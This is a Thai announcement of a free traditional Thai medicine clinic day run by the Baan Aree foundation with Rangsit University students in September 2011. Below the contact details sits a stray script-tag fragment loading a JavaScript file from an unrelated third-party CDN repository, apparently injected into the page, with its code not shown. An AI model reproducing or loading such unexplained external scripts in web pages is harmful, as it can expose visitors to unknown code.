พบแพทย์แผนไทย ใจอารี ครั้งที่ ๔ ตรวจวินิจฉัย -จ่ายยาไทย-นวดไทย โดยไม่มีค่าใช้จ่ายใดๆ

 นานา    22 ก.ย. 2554

มูลนิธิบ้านบ้านอารีย์ ร่วมกับคณะการแพทย์แผนตะวันออก มหาวิทยาลัยรังสิต
บริการตรวจวินิจฉัยโรค – รักษา - จ่ายยา –นวดรักษา โดยไม่มีค่าบริการใดๆ
ในวันเสาร์ที่ ๒๔ กันยายน ๒๕๕๔ เวลา ณ ห้องสมุดธรรมะบ้านอารีย์

เพื่อเปิดโอกาสให้ประชาชนได้รับบริการสุขภาพโดยหลักการแพทย์แผนไทยที่มีคุณภาพ
และเป็นการฝึกประสบการณ์ในการบริการสุขภาพของนักศึกษา ปี ๔
ตามหลักการแพทย์แผนไทยที่ครบถ้วน ผสมผสานการใช้ยาแผนไทยที่ดีมีมาตรฐานตามต้นตำรับ
และการนวดไทย

สำหรับการตรวจรักษาโดยแพทย์แผนไทย
กรุณาลงชื่อเพื่อขอรับสิทธิ์ เคาน์เตอร์ประชาสัมพันธ์ห้องสมุดฯ หรือ
โทรฯ ๐๒ ๒๗๙ ๗๘๓๘
 https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   
  3,651 

  แสดงความคิดเห็น


RELATED STORIESจีรัง กรุ๊ป    

 ธรรมะไทย